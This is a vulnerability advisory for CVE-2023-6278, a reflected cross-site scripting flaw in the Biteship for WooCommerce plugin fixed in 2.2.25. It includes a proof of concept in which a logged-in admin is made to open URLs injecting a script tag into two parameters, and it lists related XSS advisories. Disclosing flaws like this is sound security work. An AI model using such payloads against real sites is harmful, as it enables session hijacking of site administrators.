Biteship for WooCommerce < 2.2.25 – Reflected Cross-Site Scripting | CVE 2023-6278 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below:

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_message=<script>alert(/XSS/)</script>

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_error=<script>alert(/XSS/)</script>

Affects Plugins

Fixed in 2.2.25

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Enrico Marcolini, Claudio Marchesini

Submitter

Enrico Marcolini, Claudio Marchesini

Submitter website

https://www.dottormarc.it

Submitter twitter

Verified

Yes

WPVDB ID

dfe5001f-31b9-4de2-a240-f7f5a992ac49

Timeline

Publicly Published

2023-11-17 (about 2 years ago)

Added

2024-01-03 (about 1 year ago)

Last Updated

2024-01-08 (about 1 year ago)

Other

Published

Title

Published

2024-03-08

Title

Blocksy < 2.0.27 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-07-26

Title

ParityPress < 1.0.1 - Admin+ Stored XSS

Published

2025-01-03

Title

Media Library Assistant < 3.24 - Reflected Cross-Site Scripting via smc_settings_tab, unattachfixit-action, and woofixit-action Parameters

Published

2024-10-09

Title

WP Builder <= 3.0.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

Published

2024-12-30

Title

Form Maker by 10Web < 1.15.33 - Admin+ Stored XSS via Theme Title